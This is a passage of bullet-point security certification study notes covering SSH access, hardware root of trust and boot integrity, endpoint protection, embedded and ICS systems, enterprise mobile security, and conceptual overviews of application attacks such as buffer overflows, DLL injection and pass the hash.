separate network infrastructure.
● Jump Servers:
○ A hardened server that provides access to other hosts.
○ One of the challenges of managing hosts that are exposed to the Internet,
such as servers and appliances in a DMZ, is to provide administrative
access to them.
○ Administrators connect to the jump server then use the jump server to
connect to the admin interface on the application server.
Secure Shell
● Secure Shell (SSH) is the principal means of obtaining secure remote access to
a command line terminal.
● The main uses of SSH are for remote administration and secure file transfer
(SFTP).
● SSH Client Authentication:
○ Each of these methods can be enabled or disabled as required on the
server, using the /etc/ssh/sshd_config file:
■ Username/password—the client submits credentials that are
verified by the SSH server either against a local user database or
using a RADIUS/TACACS+ server.
■ Public key authentication—each remote user's public key is added
to a list of keys authorized for each local account on the SSH
server.
■ Kerberos—the client submits a Ticket Granting Ticket (TGT) to the
Ticket Granting Service (TGS) along with the Service Principal
Name (SPN) of the SSH server that the client wants to access.
● SSH Commands:
○ SSH commands are used to connect to hosts and set up authentication
methods.
○ To connect to an SSH server at 10.1.0.10 using an account named
"bobby" and password authentication, run:
■ ssh bobby@10.1.0.10
○ The following commands create a new key pair and copy it to an account
on the remote server:
■ ssh-keygen -t rsa
■ ssh-copy-id bobby@10.1.0.10

Lesson 12: Implementing Host Security Solutions

Hardware Root of Trust

 ● A cryptographic module embedded within a computer system that can endorse
trusted execution and attest to boot settings and metrics.
○ For example, when a computer joins a network, it might submit a report to
the network access control (NAC) server declaring, "My operating system
files have not been replaced with malicious versions."
● The hardware root of trust is used to scan the boot metrics and OS files to verify
their signatures, then it signs the report.
● The NAC server can trust the signature and therefore the report contents if it can
trust that the signing entity's private key is secure.
● The RoT is usually established by a type of cryptoprocessor called a trusted
platform module (TPM).
○ TPM is a specification for hardware-based storage of encryption keys,
hashed passwords, and other user and platform identification information.
○ The TPM is implemented either as part of the chipset or as an embedded
function of the CPU.
○ Each TPM is hard-coded with a unique, unchangeable asymmetric private
key called the endorsement key.
■ This endorsement key is used to create various other types of
subkeys used in key storage, signature, and encryption operations.

Boot Integrity
● Most PCs implement the unified extensible firmware interface (UEFI).
○ UEFI provides code that allows the host to boot to an OS. UEFI can
enforce a number of boot integrity checks.
● Secure Boot:
○ Secure boot is designed to prevent a computer from being hijacked by a
malicious OS.
○ UEFI is configured with digital certificates from valid OS vendors.
○ The system firmware checks the operating system boot loader and kernel
using the stored certificate to ensure that it has been digitally signed by
the OS vendor.
 ● Measured Boot:
○ A trusted or measured boot process uses platform configuration registers
(PCRs) in the TPM at each stage in the boot process to check whether
hashes of key system state data (boot firmware, boot loader, OS kernel,
and critical drivers) have changed.
● Boot Attestation:
○ Report of boot state integrity data that is signed by a tamper-proof TPM
key and reported to a network server.
○ The boot log can be analyzed for signs of compromise, such as the
presence of unsigned drivers.

Disk Encryption
● Full disk encryption (FDE) means that the entire contents of the drive (or
volume), including system files and folders, are encrypted.
● Drive encryption allays this security concern by making the contents of the drive
accessible only in combination with the correct encryption key.
● FDE requires the secure storage of the key used to encrypt the drive contents.
○ Normally, this is stored in a TPM.
○ The TPM chip has a secure storage area that a disk encryption program,
such as Windows BitLocker, can write its keys to.
● One of the drawbacks of FDE is that, because the OS performs the cryptographic
operations, performance is reduced.
○ This issue is mitigated by self-encrypting drives (SED), where the
cryptographic operations are performed by the drive controller.
■ The SED uses a symmetric data/media encryption key (DEK/MEK)
for bulk encryption and stores the DEK securely by encrypting it
with an asymmetric key pair called either the authentication key
(AK) or key encryption key (KEK).
■ Use of the AK is authenticated by the user password.
USB and Flash Drive Security
● A modified device may have visual clues that distinguish it from a mass
manufactured thumb drive or cable, but these may be difficult to spot.
● Another example is the O.MG cable which packs enough processing capability
into an ordinary-looking USB-Lightning cable to run an access point and
keylogger.

Third-Party Risk Management

● Hardware and firmware vulnerabilities and exploits demonstrate the necessity of
third-party risk management.
● Anyone with the time and resources to modify the computer's firmware could (in
theory) create some sort of backdoor access.
● When assessing suppliers for risk, it is helpful to distinguish two types of
relationship:
○ Vendor—this means a supplier of commodity goods and services, possibly
with some level of customization and direct support.
○ Business partner—this implies a closer relationship where two companies
share quite closely aligned goals and marketing opportunities.

End of Life Systems

● When a manufacturer discontinues sales of a product, it enters an end of life
(EOL) phase in which support and availability of spares and updates become
more limited.
● An end of service life (EOSL) system is one that is no longer supported by its
developer or vendor.

Organizational Security Agreements

● It is important to remember that although one can outsource virtually any service
or activity to a third party, one cannot outsource legal accountability for these
services or actions.
 ● Issues of security risk awareness, shared duties, and contractual responsibilities
can be set out in a formal legal agreement.
● The following types of agreements are common:
○ Memorandum of understanding (MOU)—A preliminary or exploratory
agreement to express an intent to work together.
○ Business partnership agreement (BPA)—While there are many ways of
establishing business partnerships, the most common model in IT is the
partner agreements that large IT companies (such as Microsoft and Cisco)
set up with resellers and solution providers.
○ Nondisclosure agreement (NDA)—Legal basis for protecting information
assets.
■ If the employee or contractor breaks this agreement and does
share such information, they may face legal consequences.
○ Service level agreement (SLA)—A contractual agreement setting out the
detailed terms under which a service is provided.
○ Measurement systems analysis (MSA)—quality management
processes, such as Six Sigma, make use of quantified analysis methods
to determine the effectiveness of a system.
■ A measurement systems analysis (MSA) is a means of evaluating
the data collection and statistical methods used by a quality
management process to ensure they are robust.

Hardening
● The process of putting an operating system or application in a secure
configuration is called hardening.
● The essential principle is of least functionality; that a system should run only the
protocols and services required by legitimate users and no more.
● Services provide a library of functions for different types of applications. Some
services support local features of the OS and installed applications.
● Application service ports allow client software to connect to applications over a
network.
 ○ These should either be disabled or blocked at a firewall if remote access is
not required.
● Persistent storage holds user data generated by applications, plus cached
credentials.
○ Disk encryption is essential to data security.

Baseline Configuration and Registry Settings

● You will have separate configuration baselines for desktop clients, file and print
servers, Domain Name System (DNS) servers, application servers, directory
services servers, and other types of systems.
● In Windows, configuration settings are stored in the registry.
● These policy settings are applied to the registry each time a computer boots.
● Baseline deviation reporting means testing the actual configuration of hosts to
ensure that their configuration settings match the baseline template.
○ On Windows networks, the Microsoft Baseline Security Analyzer (MBSA)
tool was popularly used to validate the security configuration.

Patch Management
● Automated vulnerability scanners can be effective at discovering missing
patches for the operating system, plus a wide range of third-party software apps
and devices/firmware.
● On residential and small networks, hosts will be configured to auto-update,
meaning that they check for and install patches automatically.
● These issues can be mitigated by deploying an enterprise patch management
suite.
○ Identifying, testing, and deploying OS and application updates.

Endpoint Protection
● Antivirus (A-V)/Anti-Malware:
 ○ An "A-V" product will now perform generalized malware detection,
meaning not just viruses and worms, but also Trojans, spyware, PUPs,
cryptojackers, and so on.
● Host-Based Intrusion Detection/Prevention (HIDS/HIPS):
○ Host-based intrusion detection systems (HIDS) provide threat detection
via log and file system monitoring.
○ File system integrity monitoring uses signatures to detect whether a
managed file image—such as an OS system file, driver, or application
executable—has changed.
● Endpoint Protection Platform (EPP):
○ An endpoint protection platform (EPP) is a single agent performing
multiple security tasks, including malware/intrusion detection and
prevention, but also other security features, such as a host firewall, web
content filtering/secure search and browsing, and file/message encryption.
● Data Loss Prevention (DLP):
○ Many EPPs include a data loss prevention (DLP) agent.
○ This is configured with policies to identify privileged files and strings that
should be kept private or confidential, such as credit card numbers.
○ The agent enforces the policy to prevent data from being copied or
attached to a message without authorization.
● Endpoint Protection Deployment:
○ While specific products vary widely in terms of features and
implementation detail, some generic tasks to implement endpoint
protection include:
■ 1. Configure the management system to push the agent software
and any updates to all desktops. This will require configuring
permissions and firewall settings.
■ 2. Assign hosts to appropriate groups for policy assignment. For
example, client endpoints have very different security requirements
to servers.
 ■ 3. Test the different host group configuration settings to ensure that
the expected range of threats is detected.
■ 4. Use a monitoring dashboard to verify status across all network
hosts. Apart from detection events, if the agent is disabled or
missing, there should be an alert.

Next-Generation Endpoint Protection

● Endpoint Detection and Response (EDR):
○ A software agent that collects system data and logs for analysis by a
monitoring system to provide early detection of threats.
○ The aim is not to prevent initial execution, but to provide real-time and
historical visibility into the compromise, contain the malware within a
single host, and facilitate remediation of the host to its original state.
● Next-Generation Firewall Integration:
○ An analytics-driven next-gen antivirus product is likely to combine with the
perimeter and zonal security offered by next-gen firewalls.
○ For example, detecting a threat on an endpoint could automate a firewall
policy to block the covert channel at the perimeter, isolate the endpoint,
and mitigate risks of the malware using lateral movement between hosts.

Antivirus Response
● An on-access antivirus scanner or intrusion prevention system works by
identifying when processes or scripts are executed and intercepting (or hooking)
the call to scan the code first.
● If the code matches a signature of known malware or exhibits malware-like
behavior that matches a heuristic profile, the scanner will prevent execution and
attempt to take the configured action on the host file (clean, quarantine, erase,
and so on).
● An alert will be displayed to the user and the action will be logged (and also may
generate an administrative alert).
● Advanced Malware Tools:
 ○ When you identify symptoms such as these, but the AV scanner or EPP
agent does not report an infection, you will need to analyze the host for
malware using advanced tools.
● Sandboxing:
○ Sandboxing is a technique that isolates an untrusted host or app in a
segregated environment to conduct tests.

Embedded Systems
● An embedded system is a complete computer system that is designed to
perform a specific, dedicated function.
● Embedded systems can be characterized as static environments.
○ A static environment does not allow or require such frequent changes.
● A PC is a dynamic environment.
○ The user can add or remove programs and data files, install new hardware
components, and upgrade the operating system.
● Cost, Power, and Compute Constraints:
○ Embedded systems are usually constrained in terms of processor
capability (cores and speed), system memory, and persistent storage.
○ The other factor determining compute resources is power.
■ Many embedded devices are battery-powered, and may need to
run for years without having to replace the cells.
■ This means that processing must be kept to the minimum possible
level.
● Crypto, Authentication, and Implied Trust Constraints:
○ The lack of computer resources means that embedded systems are not
well-matched to the cryptographic identification and authentication
technologies that are widely used on computer networks.
○ As embedded systems become more accessible via those networks,
however, they need to use cryptoprocessors to ensure confidentiality,
integrity, and availability.
● Network and Range Constraints:
 ○ Networks for embedded systems emphasize power-efficient transfer of
small amounts of data with a high degree of reliability and low latency.

Logic Controllers for Embedded Systems

● Embedded systems are normally based on firmware running on a
programmable logic controller (PLC).
○ A type of computer designed for deployment in an industrial or outdoor
setting that can automate and monitor mechanical systems.
● System on Chip (SoC):
○ System on chip (SoC) is a design where all these processors,
controllers, and devices are provided on a single processor die (or chip).
○ Raspberry Pi (raspberrypi.org) and Arduino (arduino.cc) are examples of
SoC boards, initially devised as educational tools, but now widely used for
industrial applications, and hacking.
● Field Programmable Gate Array (FPGA):
○ A microcontroller is a processing unit that can perform sequential
operations from a dedicated instruction set.
○ FPGA: A processor that can be programmed to perform a specific function
by a customer rather than at the time of manufacture.
● Real-Time Operating Systems (RTOS):
○ Many embedded systems operate devices that perform acutely time-
sensitive tasks, such as drip meters or flow valves.
○ RTOS: A type of OS that prioritizes deterministic execution of operations
to ensure consistent response for time-critical tasks.

Embedded Systems Communications Considerations

● Operational Technology (OT) Networks:
○ A cabled network for industrial applications is referred to as an operational
technology (OT) network.
○ These typically use either serial data protocols or industrial Ethernet.
● Cellular Networks:
 ○ This is also called baseband radio, after the baseband processor that
performs the function of a cellular modem.
○ There are several baseband radio technologies:
■ Narrowband-IoT (NB-IoT)—this refers to a low-power version of the
Long Term Evolution (LTE) or 4G cellular standard.
● The signal occupies less bandwidth than regular cellular.
● Narrowband also has greater penetrating power, making it
more suitable for use in inaccessible locations, such as
tunnels or deep within buildings, where ordinary cellular
connectivity would be impossible.
■ LTE Machine Type Communication (LTE-M)—this is another low-
power system, but supports higher bandwidth (up to about 1 Mbps).
○ Any LTE-based cellular radio uses a subscriber identity module (SIM)
card as an identifier.
● Z-Wave and Zigbee:
○ Z-Wave and Zigbee are wireless communications protocols used primarily
for home automation.
○ In Z-Wave, devices can be configured to work as repeaters to extend the
network but there is a limit of four "hops" between a controller device and
an endpoint.
○ Zigbee: Low-power wireless communications open source protocol used
primarily for home automation.
■ ZigBee uses radio frequencies in the 2.4 GHz band and a mesh
topology.

Industrial Control Systems

● Workflow and Process Automation Systems:
○ Industrial control systems (ICSs): A network managing embedded devices
(computer systems that are designed to perform a specific, dedicated
function).
○ An ICS comprises plant devices and equipment with embedded PLCs.
 ■ The PLCs are linked either by an OT fieldbus serial network or by
industrial Ethernet to actuators that operate valves, motors, circuit
breakers, and other mechanical components, plus sensors that
monitor some local state, such as temperature.
○ Output and configuration of a PLC is performed by one or more human-
machine interfaces (HMIs).
■ An HMI might be a local control panel or software running on a
computing host.
○ Another important concept is the data historian, which is a database of all
the information generated by the control loop.
● Supervisory Control and Data Acquisition (SCADA):
○ A supervisory control and data acquisition (SCADA) system takes the
place of a control server in large-scale, multiple-site ICSs.
○ SCADA typically run as software on ordinary computers, gathering data
from and managing plant devices and equipment with embedded PLCs,
referred to as field devices.
● ICS/SCADA Applications:
○ Energy refers to power generation and distribution. More widely, utilities
include water/sewage and transportation networks.
○ Industrial can refer specifically to the process of mining and refining raw
materials, involving hazardous high heat and pressure furnaces, presses,
centrifuges, pumps, and so on.
○ Fabrication and manufacturing refer to creating components and
assembling them into products.

Internet of Things
● The term Internet of Things (IoT) is used to describe a global network of
appliances and personal devices that have been equipped with sensors,
software, and network connectivity

Specialized Systems for Facility Automation

 ● Building Automation System (BAS):
○ A building automation system (BAS) for offices and data centers
("smart buildings") can include physical access control systems, but also
heating, ventilation, and air conditioning (HVAC), fire control, power and
lighting, and elevators and escalators.
○ Some typical vulnerabilities that affect these systems include:
■ Process and memory vulnerabilities, such as buffer overflow, in the
PLCs
■ Use of plaintext credentials or cryptographic keys within application
code.
■ Code injection via the graphical web application interfaces used to
configure and monitor systems.
○ It is possible that control of these systems could be used to perform some
sort of DoS or ransom demand (consider disrupting HVAC controls within
a data center, for instance).
● Smart Meters:
○ A smart meter provides continually updating reports of electricity, gas, or
water usage to the supplier, reducing the need for manual inspections.
○ Most meters use cellular data for communication back to the supplier, and
an IoT protocol, such as ZigBee, for integration with smart appliances.
● Surveillance Systems:
○ A physical access control system (PACS) is a network of monitored locks,
intruder alarms, and video surveillance.

Specialized Systems in IT
● Multifunction Printers (MFPs):
○ Often these print/scan/fax functions are performed by single devices,
referred to as multifunction printers (MFPs).
■ Any device that performs more than one function, but typically print
devices that can also scan and fax.
 ○ Some of the more feature-rich, networked printers and MFPs can also be
used as a pivot point to attack the rest of the network.
● Voice over IP (VoIP):
○ Types of embedded systems are used to implement both Voice over IP
(VoIP) endpoints and media gateways.

Specialized Systems for Vehicles and Drones

● Automobiles and unmanned aerial vehicles (UAV), or drones, contain
sophisticated electronics to control engine and power systems, braking and
landing, and suspension/stability.
● The locking, alarm, and engine immobilizer mechanisms are also likely to be part
of the same system.
○ Each of these subsystems is implemented as an electronic control unit
(ECU), connected via one or more controller area network (CAN) serial
communications buses.
● The CAN bus operates in a somewhat similar manner to shared Ethernet and
was designed with just as little security.
○ A serial network designed to allow communications between embedded
programmable logic controllers.

Specialized Systems for Medical Devices

● As well as unsecure communication protocols, many of the control systems for
these devices run on unsupported versions of operating systems (such as
Windows XP) because the costs of updating the software to work with newer OS
versions is high and disruptive to patient services.
● Some of the goals of attacks on medical devices and services are as follows:
○ Use compromised devices to pivot to networks storing medical data with
the aim of stealing protected health information (PHI).
○ Hold medical units ransom by threatening to disrupt services.
○ Kill or injure patients (or threaten to do so) by tampering with dosage
levels or device settings.
Security for Embedded Systems
● Network Segmentation:
○ Network access for static environments should only be required for
applying firmware updates and management controls from the host
software to the devices and for reporting status and diagnostic information
from the devices back to the host software.
○ This control network should be separated from the corporate network
using firewalls and VLANs.
○ With environments such as SCADA, the management software may
require legacy versions of operating systems, making the hosts
particularly difficult to secure.
○ Isolating these hosts from others through network segmentation and using
endpoint security (preventing the attachment of USB devices) can help to
ensure they do not become infected with malware or exposed to network
exploits.
● Wrappers:
○ One way of increasing the security of data in transit for embedded
systems is through the use of wrappers, such as IPSec.
○ The only thing visible to an attacker or anyone sniffing the wire is the
IPSec header, which describes only the tunnel endpoints.
○ This is useful for protecting traffic between trusted networks when the
traffic has to go through an untrusted network to go between them, or
between trusted nodes on the same network.
● Firmware Code Control and Inability to Patch:
○ Firmware patching is just as vital as keeping host OS software up to date,
but for many embedded systems, it is far more of a challenge:
■ Many embedded systems and IoT devices use low-cost firmware
chips and the vendor never produces updates to fix security
problems or only produces updates for a relatively short product
cycle (while the device could remain in operational use for much
longer).
 ■ Many embedded systems require manual updates, which are
perceived as too time-consuming for a security department with
other priorities to perform.
■ Availability is a key attribute for most embedded deployments.
Patching without service interruption may not be possible, and
opportunities for downtime servicing extremely limited.

Lesson 13: implementing Secure Mobile Solutions

Mobile Device Deployment Models

● A mobile device deployment model describes the way employees are provided
with mobile devices and applications.
● Bring your own device (BYOD)—the mobile device is owned by the employee.
● Corporate owned, business only (COBO)—the device is the property of the
company and may only be used for company business.
● Corporate owned, personally-enabled (COPE)—the device is chosen and
supplied by the company and remains its property.
● Choose your own device (CYOD)—much the same as COPE but the employee
is given a choice of device from a list.

Enterprise Mobility Management

● There are two main functions of an EMM product suite:
○ Mobile device management (MDM)—sets device policies for
authentication, feature use (camera and microphone), and connectivity.
○ Mobile application management (MAM)—sets policies for apps that can
process corporate data, and prevents data transfer to personal apps.
● Unified Endpoint Management:
○ Enterprise software for controlling device settings, apps, and corporate
data storage on all types of fixed, mobile, and IoT computing devices.
 ○ When the device is enrolled with the management software, it can be
configured with policies to allow or restrict use of apps, corporate data,
and built-in functions, such as a video camera or microphone.

iOS in The Enterprise

● Apps have to be submitted to and approved by Apple before they are released to
users via the App Store.
● Corporate control over iOS devices and distribution of corporate and B2B
(Business-to-Business) apps is facilitated by participating in the Device
Enrollment Program (support.apple.com/business), the Volume Purchase
Program, and the Developer Enterprise Program
(developer.apple.com/programs/enterprise).

Android in the Enterprise

● iOS devices are normally updated very quickly. With Android, the situation is less
consistent, as updates often depend on the handset vendor to complete the new
version or issue the patch for their flavor of Android.
● SEAndroid: Since version 4.3, Android has been based on Security-Enhanced
Linux, enabling granular permissions for apps, container isolation, and storage
segmentation.

Mobile Access Control Systems

● Context-Aware Authentication:
○ An access control scheme that verifies an object's identity based on
various environmental factors, like time, location, and behavior.
○ For example, smartphones now allow users to disable screen locks when
the device detects that it is in a trusted location, such as the home.

Remote Wipe
● A remote wipe or kill switch means that if the handset is stolen it can be set to
the factory defaults or cleared of any personal data (sanitization).
 ● The remote wipe could be triggered by several incorrect passcode attempts or by
enterprise management software.
● In theory, a thief can prevent a remote wipe by ensuring the phone cannot
connect to the network, then hacking the phone and disabling the security.

Full Device Encryption and External Media

● In iOS, there are various levels of encryption.
○ All user data on the device is always encrypted but the key is stored on
the device.
■ This is primarily used as a means of wiping the device. The OS just
needs to delete the key to make the data inaccessible rather than
wiping each storage location.
○ Email data and any apps using the "Data Protection" option are subject to
a second round of encryption using a key derived from and protected by
the user's credential.
■ This provides security for data in the event that the device is stolen.
Not all user data is encrypted using the "Data Protection" option;
contacts, SMS messages, and pictures are not, for example.
○ In iOS, Data Protection encryption is enabled automatically when you
configure a password lock on the device.
● In Android, there are substantial differences to encryption options between
versions.
○ As of Android 10, there is no full disk encryption as it is considered too
detrimental to performance. User data is encrypted at file-level by default.
○ Some Android handsets support removable storage using external media,
such as a plug-in Micro SecureDigital (SD) card slot.

Location Services
● Geolocation is the use of network attributes to identify (or estimate) the physical
position of a device.
 ● The device uses location services to determine its current position. Location
services can make use of two systems:
○ Global Positioning System (GPS)—a means of determining the device's
latitude and longitude based on information received from satellites via a
GPS sensor.
○ Indoor Positioning System (IPS)—works out a device's location by
triangulating its proximity to other radio sources, such as cell towers, Wi-Fi
access points, and Bluetooth/RFID beacons.
● Geofencing and Camera/Microphone Enforcement:
○ Geofencing is the practice of creating a virtual boundary based on real-
world geography.
● GPS Tagging:
○ GPS tagging is the process of adding geographical identification
metadata, such as the latitude and longitude where the device was
located at the time, to media such as photographs, SMS messages, video,
and so on.
○ GPS tagged pictures uploaded to social media could be used to track a
person's movements and location.

Application Management
● When a device is joined to the corporate network through enrollment with
management software, it can be configured into an enterprise workspace mode
in which only a certain number of authorized applications can run.
● A trusted app source is one that is managed by a service provider.
● The service provider authenticates and authorizes valid developers, issuing them
with a certificate to use to sign their apps and warrant them as trusted.
● It may also analyze code submitted to ensure that it does not pose a security or
privacy risk to its customers (or remove apps that are discovered to pose such a
risk).
● It might not be appropriate to deliver a custom corporate app via a public store,
where anyone could download it.
 ○ Apple operates enterprise developer and distribution programs to solve
this problem, allowing private app distribution via Apple Business
Manager.

Content Management
● Containerization allows the employer to manage and maintain the portion of the
device that interfaces with the corporate network.
● An enterprise workspace with a defined selection of apps and a separate
container is created.
○ This container isolates corporate apps from the rest of the device.
○ The container can also enforce storage segmentation.

Rooting and Jailbreaking

● Rooting—this term is associated with Android devices. Some vendors provide
authorized mechanisms for users to access the root account on their device.
● Jailbreaking—iOS is more restrictive than Android so the term "jailbreaking"
became popular for exploits that enabled the user to obtain root privileges,
sideload apps, change or add carriers, and customize the interface.
○ iOS jailbreaking is accomplished by booting the device with a patched
kernel.
● Carrier unlocking—for either iOS or Android, this means removing the
restrictions that lock a device to a single carrier.

Cellular and GPS Connection Methods

● Cellular Data Connections:
○ A cellular data connection is less likely to be subject to monitoring and
filtering.
○ There have been attacks and successful exploits against the major
infrastructure and protocols underpinning the telecoms network, notably
the SS7 hack.
 ● Global Positioning System (GPS): sensor triangulates the device position using
signals from orbital GPS satellites.
○ As this triangulation process can be slow, most smartphones use Assisted
GPS (A-GPS) to obtain coordinates from the nearest cell tower and adjust
for the device's position relative to the tower.
○ GPS signals can be jammed or even spoofed using specialist radio
equipment. This might be used to defeat geofencing mechanisms, for
instance.

Bluetooth Connection Methods

● Bluetooth devices have a few known security issues:
○ Device discovery—a device can be put into discoverable mode meaning
that it will connect to any other Bluetooth devices nearby. Unfortunately,
even a device in non-discoverable mode is quite easy to detect.
○ Authentication and authorization—devices authenticate ("pair") using a
simple passkey configured on both devices.
○ Malware—there are proof-of-concept Bluetooth worms and application
exploits, most notably the BlueBorne exploit (armis.com/blueborne), which
can compromise any active and unpatched system regardless of whether
discovery is enabled and without requiring any user intervention.
● Bluejacking: spam where someone sends you an unsolicited text (or
picture/video) message or vCard (contact details).
○ This can also be a vector for malware, as demonstrated by the Obad
Android Trojan malware.
● Bluesnarfing refers to using an exploit in Bluetooth to steal information from
someone else's phone.
○ The exploit (now patched) allows attackers to circumvent the
authentication mechanism.

Infrared and RFID Connection Methods

 ● Infrared signaling has been used for PAN in the past (IrDA), but the use of
infrared in modern smartphones and wearable technology focuses on two other
uses:
○ IR blaster—this allows the device to interact with an IR receiver and
operate a device such as a TV or HVAC monitor as though it were the
remote control handset.
○ IR sensor—these are used as proximity sensors (to detect when a
smartphone is being held to the ear, for instance) and to measure health
information (such as heart rate and blood oxygen levels).
● Radio Frequency ID (RFID) is a means of encoding information into passive
tags, which can be easily attached to devices, structures, clothing, or almost
anything else.
○ When a reader is within range of the tag, it produces an electromagnetic
wave that powers up the tag and allows the reader to collect information
from it or to change the values encoded in the tag.
● One type of RFID attack is skimming, which is where an attacker uses a
fraudulent RFID reader to read the signals from a contactless bank card.
○ Any reader can access any data stored on any RFID tag, so sensitive
information must be protected using cryptography.

Near Field Communications and Mobile Payment Services

● NFC is based on a particular type of radio frequency ID (RFID)
○ An NFC chip can also be used to read passive RFID tags at close range.
○ It can also be used to configure other types of connections (pairing
Bluetooth devices for instance) and for exchanging information, such as
contact cards.
● NFC does not provide encryption, so eavesdropping and man-in-the-middle
attacks are possible if the attacker can find some way of intercepting the
communication and the software services are not encrypting the data.
● To configure a payment service, the user enters their credit card information into
a mobile wallet app on the device.
 ○ The wallet app does not transmit the original credit card information, but a
one-time token that is interpreted by the card merchant and linked back to
the relevant customer account.
● Despite having a close physical proximity requirement, NFC is vulnerable to
several types of attacks.
○ Certain antenna configurations may be able to pick up the RF signals
emitted by NFC from several feet away, giving an attacker the ability to
eavesdrop from a more comfortable distance.
○ An attacker with a reader may also be able to skim information from an
NFC device in a crowded area, such as a busy train station.

USB Connection Methods

● Some Android USB ports support USB On The Go (OTG) and there are
adapters for iOS devices.
○ SB OTG allows a port to function either as a host or as a device.
○ For example, a port on a smartphone might operate as a device when
connected to a PC, but as a host when connected to a keyboard or
external hard drive.
○ This function is determined by the state of a 5th pin in the connector.

SMS/MMS/RCS and Push Notifications

● The Short Message Service (SMS) and Multimedia Message Service (MMS)
are operated by the cellular network providers.
○ They allow transmission of text messages and binary files.
● Rich Communication Services (RCS) is designed as a platform-independent
advanced messaging app, with a similar feature set to proprietary apps like
WhatsApp and iMessage.
○ These features include support for video calling, larger binary
attachments, group messaging/calling, and read receipts.
● Push Notifications:
Firmware Over-the-Air Updates
● A baseband update modifies the firmware of the radio modem used for cellular,
Wi-Fi, Bluetooth, NFC, and GPS connectivity.
● Over-the-air (OTA): A firmware update delivered on a cellular data connection.

Microwave Radio Connection Methods

● Microwave radio is also used as a backhaul link from a cell tower to the service
provider's network.
● A microwave link can be provisioned in two modes:
○ Point-to-point (P2P) microwave uses high-gain antennas to link two sites.
■ Each antenna is pointed directly at the other. In terms of security,
this makes it difficult to eavesdrop on the signal, as an intercepting
antenna would have to be positioned within the direct path.
○ Point-to-multipoint (P2M) microwave uses smaller sectoral antennas,
each covering a separate quadrant.
■ Where P2P is between two sites, P2M links multiple sites or
subscriber nodes to a single hub.
■ Because of the higher risk of signal interception compared to P2P,
it is crucial that links be protected by over-the-air encryption.

Lesson 14: Summarizing Secure Application Concepts

Application Attacks
● An application vulnerability is a design flaw that can cause the application
security system to be circumvented or that will cause the application to crash.
● Privilege Escalation:
○ The purpose of most application attacks is to allow the threat actor to run
his or her own code on the system.
■ This is referred to as arbitrary code execution.
○ Where the code is transmitted from one machine to another, it can be
referred to as remote code execution.
 ○ Depending on how the software is written, a process may run using a
system account, the account of the logged-on user, or a nominated
account.
○ There are two main types of privilege escalation:
■ Vertical privilege escalation (or elevation) is where a user or
application can access functionality or data that should not be
available to them.
● For instance, a process might run with local administrator
privileges, but a vulnerability allows the arbitrary code to run
with higher system privileges.
■ Horizontal privilege escalation is where a user accesses
functionality or data that is intended for another user.
● For instance, via a process running with local administrator
privileges on a client workstation, the arbitrary code is able
to execute as a domain account on an application server.
● Error Handling:
○ An application attack may cause an error message.
○ In Windows, this may be of the following types: "Instruction could not be
read or written," "Undefined exception," or "Process has encountered a
problem."
○ One issue for error handling is that the application should not reveal
configuration or platform details that could help an attacker.
● Improper Input Handling:
○ Most software accepts user input of some kind, whether the input is typed
manually or passed to the program by another program, such as a
browser passing a URL to a web server or a Windows process using
another process via its application programming interface.

Overflow Vulnerabilities
● In an overflow attack, the threat actor submits input that is too large to be stored
in a variable assigned by the application.
 ● Unsuccessful attempts may be revealed through unexplained crashes or error
messages following a file download, execution of a new app or a script, or
connection of new hardware.
● Buffer Overflow:
○ A buffer is an area of memory that the application reserves to store
expected data.
○ To exploit a buffer overflow vulnerability, the attacker passes data that
deliberately overfills the buffer.
○ One of the most common vulnerabilities is a stack overflow.
■ The stack is an area of memory used by a program subroutine. It
includes a return address, which is the location of the program that
has called the subroutine.
● Integer Overflow:
○ An attack in which a computed result is too large to fit in its assigned
storage space, which may lead to crashing or data corruption, and may
trigger a buffer overflow.
○ This may cause a positive number to become negative (changing a bank
debit to a credit, for instance). It could also be used where the software is
calculating a buffer size.

NULL Pointer Dereferencing and Race Conditions

● In C/C++ programming, a pointer is a variable that stores a memory location,
rather than a value.
● If the memory location is invalid or null (perhaps by some malicious process
altering the execution environment), this creates a null pointer dereference type
of exception, and the process will crash, probably.
● Race conditions occur when the outcome from an execution process is directly
dependent on the order and timing of certain events, and those events fail to
execute in the order and timing intended by the developer.
 ● A time of check to time of use (TOCTTOU) race condition occurs when there is
a change between when an app checked a resource and when the app used the
resource.

Memory Leaks and Resource Exhaustion

● If a process is operating correctly, when it no longer requires a block of memory,
it should release it.
● If the program code does not do this, it could create a situation where the system
continually leaks memory to the faulty process.
○ This means less memory is available to other processes and the system
could crash.
● Memory leaks are particularly serious in service/background applications, as
they will continue to consume memory over an extended period.
● More generally, a malicious process might cause denial of service or set up the
conditions for privilege escalation via resource exhaustion.
○ Resources refers to CPU time, system memory allocation, fixed disk
capacity, and network utilization.

DLL Injection and Driver Manipulation

● A dynamic link library (DLL) is a binary package that implements some sort of
standard functionality, such as establishing a network connection or performing
cryptography.
● DLL Injection:
○ A software vulnerability that can occur when a Windows-based application
attempts to force another running application to load a Dynamic Link
Library (DLL) in memory that could cause the victim application to
experience instability or leak sensitive information.
○ The link library will contain whatever functions the malware author wants
to be able to run.
○ Malware uses this technique to move from one host process to another to
avoid detection.
 ○ A process that has been compromised by DLL injection might open
unexpected network connections, or interact with files and the registry
suspiciously.
○ It must also evade detection by anti-virus software. One means of doing
this is code refactoring.
■ Refactoring means that the code performs the same function by
using different methods (control blocks, variable types, and so on).
○ Shim: The process of developing and implementing additional code
between an application and the operating system to enable functionality
that would otherwise be unavailable.

Pass the Hash Attack

● Attackers can extend their lateral movement by a great deal if they are able to
compromise host credentials.
● One common credential exploit technique for lateral movement is called pass
the hash (PtH).
○ This is the process of harvesting an account's cached credentials when
the user is logged into a single sign-on (SSO) system so the attacker can
use the credentials on other systems.
● Pass the hash is relatively difficult to detect, as it exploits legitimate network
behavior.

●
Uniform Resource Locator Analysis
● A uniform resource locator (URL) can encode some action or data to submit to
the server host. This is a common vector for malicious activity.

●
● HTTP Methods:
○ An HTTP session starts with a client (a user-agent, such as a web
browser) making a request to an HTTP server.
○ The connection establishes a TCP connection.
○ This TCP connection can be used for multiple requests, or a client can
start new TCP connections for different requests.
○ A request typically comprises a method, a resource (such as a URL path),
version number, headers, and body.
○ Data can be submitted to a server either by using a POST or PUT method
and the HTTP headers and body, or by encoding the data within the URL
used to access the resource.
○ Data submitted via a URL is delimited by the ? character, which follows
the resource path.
● Percent Encoding:
○ A URL can contain only unreserved and reserved characters from the
ASCII set.
○ Reserved ASCII characters are used as delimiters within the URL syntax
and should only be used unencoded for those purposes.
 ○ The reserved characters are:
■ : / ? # [ ] @ ! $ & ' ( ) * + , ; =
○ There are also unsafe characters, which cannot be used in a URL.
